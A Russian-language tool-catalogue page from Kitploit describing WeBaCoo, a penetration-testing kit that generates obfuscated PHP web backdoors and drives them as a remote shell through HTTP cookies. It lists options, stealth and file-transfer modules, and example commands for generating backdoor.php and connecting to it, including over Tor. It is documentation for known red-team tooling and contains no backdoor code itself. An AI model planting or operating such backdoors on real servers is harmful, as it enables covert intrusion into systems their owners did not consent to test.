Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WeBaCoo — Набор скриптов для веб-бэкдора через куки | Kitploit
Инструменты/GitHubGitHub/anestisb/webacoo
Генерация полезной нагрузкиВеб-безопасностьТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubanestisb/webacoo

WeBaCoo

Набор скриптов для веб-бэкдора через куки

Репозиторий
1864214 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \ \ /\ / __/ |/ / (
| | _/\ () | (_) | / / _
_/ _,|_/_/ _/

root@kitploit:~
 Web Backdoor Cookie Script-Kit

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Автор: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis

Отказ от ответственности

Инструмент предназначен только для тестирования и может использоваться только при наличии строгого согласия. Не используйте его в незаконных целях.

Лицензия

Любые модификации, изменения или доработки данного приложения допустимы, однако любые публичные релизы, использующие этот код, должны быть одобрены его создателем. Дополнительную информацию см. в файле LICENSE.

Требования

  • установленный perl
  • liburi-perl
  • libio-socket-socks-perl

Если вы не хотите устанавливать libio-socket-socks-perl для поддержки прокси Tor, закомментируйте строку 25 в webacoo.pl.

Использование

webacoo.pl [опции]

Опции: -g Сгенерировать код бэкдора (требуется -o)

-f ФУНКЦИЯ Используемая системная функция PHP ФУНКЦИЯ 1: system (по умолчанию) 2: shell_exec 3: exec 4: passthru 5: popen

-o ВЫВОД Имя выходного файла сгенерированного бэкдора

-r Вернуть необфусцированный код бэкдора

-t Установить удалённое «терминальное» соединение (требуется -u)

-u URL URL бэкдора

-e КОМАНДА Режим выполнения одной команды (требуется -t и -u)

-m МЕТОД Используемый HTTP-метод (по умолчанию «GET»)

-c ИМЯ_КУКИ Имя cookie (по умолчанию «M-cookie»)

-d РАЗДЕЛИТЕЛЬ Разделитель (по умолчанию случайный новый для каждого запроса)

-a AGENT HTTP-заголовок User-Agent (по умолчанию существует)

-p ПРОКСИ Использовать прокси (tor, ip:port или user:pass:ip:port)

-v УРОВЕНЬ Уровень подробности вывода УРОВЕНЬ 0: без дополнительной информации (по умолчанию) 1: вывод HTTP-заголовков 2: вывод HTTP-заголовков и данных

-l ЖУРНАЛ Записывать активность в файл

-h Показать справку и выйти

update Проверить наличие обновлений и применить, если есть

Модули расширения

Начиная с версии 0.2.1 добавлена поддержка модулей расширения, которые предоставляют дополнительные возможности для WeBaCoo. В терминальном режиме вы можете выполнить 'load', чтобы вывести список доступных модулей и инициализировать нужный из списка. Введя 'unload', вы вернетесь в исходный терминальный режим.

Доступные модули расширения: o mysql-cli Модуль командной строки MySQL o psql-cli Модуль командной строки Postgres o download Модуль скачивания файлов с использованием HTTP Post o upload Модуль загрузки файлов с выводом через stdout с помощью 'od' и 'xxd' o stealth Модуль повышения скрытности через обработку .htaccess

Примеры

  1. Создать обфусцированный бэкдор 'backdoor.php' с настройками по умолчанию ./webacoo.pl -g -o backdoor.php

  2. Создать необфусцированный бэкдор 'raw-backdoor.php' с использованием функции 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

  3. Установить «терминальное» соединение с удалённым хостом с настройками по умолчанию ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

  4. Установить «терминальное» соединение с удалённым хостом с заданными параметрами ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

  5. Установить «терминальное» соединение с удалённым хостом через локальный HTTP-прокси ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

  6. Установить «терминальное» соединение с удалённым хостом через HTTP-прокси с базовой аутентификацией ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

  7. Установить «терминальное» соединение с удалённым хостом через Tor с ведением журнала ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Скачать инструмент